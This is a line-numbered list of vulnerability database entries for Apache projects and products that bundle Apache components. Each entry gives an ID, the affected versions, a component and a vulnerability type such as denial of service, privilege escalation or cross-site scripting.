4011| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
4012| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
4013| [98605] Apple macOS up to 10.12.3 Apache denial of service
4014| [98604] Apple macOS up to 10.12.3 Apache denial of service
4015| [98603] Apple macOS up to 10.12.3 Apache denial of service
4016| [98602] Apple macOS up to 10.12.3 Apache denial of service
4017| [98601] Apple macOS up to 10.12.3 Apache denial of service
4018| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
4019| [98405] Apache Hadoop up to 0.23.10 privilege escalation
4020| [98199] Apache Camel Validation XML External Entity
4021| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
4022| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
4023| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
4024| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
4025| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
4026| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
4027| [97081] Apache Tomcat HTTPS Request denial of service
4028| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
4029| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
4030| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
4031| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
4032| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
4033| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
4034| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
4035| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
4036| [95311] Apache Storm UI Daemon privilege escalation
4037| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
4038| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
4039| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
4040| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
4041| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
4042| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
4043| [94540] Apache Tika 1.9 tika-server File information disclosure
4044| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
4045| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
4046| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
4047| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
4048| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
4049| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
4050| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4051| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4052| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
4053| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
4054| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
4055| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
4056| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
4057| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
4058| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4059| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4060| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
4061| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
4062| [93532] Apache Commons Collections Library Java privilege escalation
4063| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
4064| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
4065| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
4066| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
4067| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
4068| [93098] Apache Commons FileUpload privilege escalation
4069| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
4070| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
4071| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
4072| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
4073| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
4074| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
4075| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
4076| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
4077| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
4078| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
4079| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
4080| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
4081| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
4082| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
4083| [92549] Apache Tomcat on Red Hat privilege escalation
4084| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
4085| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
4086| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
4087| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
4088| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
4089| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
4090| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
4091| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
4092| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
4093| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
4094| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
4095| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
4096| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
4097| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
4098| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
4099| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
4100| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
4101| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
4102| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
4103| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
4104| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
4105| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
4106| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
4107| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
4108| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
4109| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
4110| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
4111| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
4112| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
4113| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
4114| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
4115| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
4116| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
4117| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
4118| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
4119| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
4120| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
4121| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
4122| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
4123| [90263] Apache Archiva Header denial of service
4124| [90262] Apache Archiva Deserialize privilege escalation
4125| [90261] Apache Archiva XML DTD Connection privilege escalation
4126| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
4127| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
4128| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
4129| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
4130| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
4131| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
4132| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
4133| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
4134| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
4135| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
4136| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
4137| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
4138| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
4139| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
4140| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
4141| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
4142| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
4143| [87765] Apache James Server 2.3.2 Command privilege escalation
4144| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
4145| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
4146| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
4147| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
4148| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
4149| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
4150| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
4151| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
4152| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
4153| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4154| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4155| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
4156| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
4157| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
4158| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4159| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4160| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
4161| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
4162| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
4163| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
4164| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
4165| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
4166| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
4167| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
4168| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
4169| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
4170| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
4171| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
4172| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
4173| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
4174| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
4175| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
4176| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
4177| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
4178| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
4179| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
4180| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
4181| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
4182| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
4183| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
4184| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
4185| [82076] Apache Ranger up to 0.5.1 privilege escalation
4186| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
4187| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
4188| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
4189| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
4190| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
4191| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
4192| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
4193| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
4194| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
4195| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
4196| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
4197| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
4198| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
4199| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
4200| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
4201| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
4202| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
4203| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
4204| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
4205| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
4206| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
4207| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
4208| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
4209| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
4210| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
4211| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
4212| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
4213| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
4214| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
4215| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
4216| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
4217| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
4218| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
4219| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
4220| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
4221| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
4222| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
4223| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
4224| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
4225| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
4226| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
4227| [79791] Cisco Products Apache Commons Collections Library privilege escalation
4228| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
4229| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
4230| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
4231| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
4232| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
4233| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
4234| [78989] Apache Ambari up to 2.1.1 Open Redirect
4235| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
4236| [78987] Apache Ambari up to 2.0.x cross site scripting
4237| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
4238| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
4239| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
4240| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
4241| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
4242| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
4243| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
4244| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
4245| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
4246| [77406] Apache Flex BlazeDS AMF Message XML External Entity
4247| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
4248| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
4249| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
4250| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
4251| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
4252| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
4253| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
4254| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
4255| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
4256| [76567] Apache Struts 2.3.20 unknown vulnerability
4257| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
4258| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
4259| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
4260| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
4261| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
4262| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
4263| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
4264| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
4265| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
4266| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
4267| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
4268| [74793] Apache Tomcat File Upload denial of service
4269| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
4270| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
4271| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
4272| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
4273| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
4274| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
4275| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
4276| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
4277| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
4278| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
4279| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
4280| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
4281| [74468] Apache Batik up to 1.6 denial of service
4282| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
4283| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
4284| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
4285| [74174] Apache WSS4J up to 2.0.0 privilege escalation
4286| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
4287| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
4288| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
4289| [73731] Apache XML Security unknown vulnerability
4290| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
4291| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
4292| [73593] Apache Traffic Server up to 5.1.0 denial of service
4293| [73511] Apache POI up to 3.10 Deadlock denial of service
4294| [73510] Apache Solr up to 4.3.0 cross site scripting
4295| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
4296| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
4297| [73173] Apache CloudStack Stack-Based unknown vulnerability
4298| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
4299| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
4300| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
4301| [72890] Apache Qpid 0.30 unknown vulnerability
4302| [72887] Apache Hive 0.13.0 File Permission privilege escalation
4303| [72878] Apache Cordova 3.5.0 cross site request forgery
4304| [72877] Apache Cordova 3.5.0 cross site request forgery
4305| [72876] Apache Cordova 3.5.0 cross site request forgery
4306| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
4307| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
4308| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
4309| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
4310| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
4311| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
4312| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
4313| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
4314| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
4315| [71629] Apache Axis2/C spoofing
4316| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
4317| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
4318| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
4319| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
4320| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
4321| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
4322| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
4323| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
4324| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
4325| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
4326| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
4327| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
4328| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
4329| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
4330| [70809] Apache POI up to 3.11 Crash denial of service
4331| [70808] Apache POI up to 3.10 unknown vulnerability
4332| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
4333| [70749] Apache Axis up to 1.4 getCN spoofing
4334| [70701] Apache Traffic Server up to 3.3.5 denial of service
4335| [70700] Apache OFBiz up to 12.04.03 cross site scripting
4336| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
4337| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
4338| [70661] Apache Subversion up to 1.6.17 denial of service
4339| [70660] Apache Subversion up to 1.6.17 spoofing
4340| [70659] Apache Subversion up to 1.6.17 spoofing
4341| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
4342| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
4343| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
4344| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
4345| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
4346| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
4347| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
4348| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
4349| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
4350| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
4351| [69846] Apache HBase up to 0.94.8 information disclosure
4352| [69783] Apache CouchDB up to 1.2.0 memory corruption
4353| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
4354| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
4355| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
4356| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
4357| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
4358| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
4359| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
4360| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
4361| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
4362| [69431] Apache Archiva up to 1.3.6 cross site scripting
4363| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
4364| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
4365| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
4366| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
4367| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
4368| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
4369| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
4370| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
4371| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
4372| [66739] Apache Camel up to 2.12.2 unknown vulnerability
4373| [66738] Apache Camel up to 2.12.2 unknown vulnerability
4374| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
4375| [66695] Apache CouchDB up to 1.2.0 cross site scripting
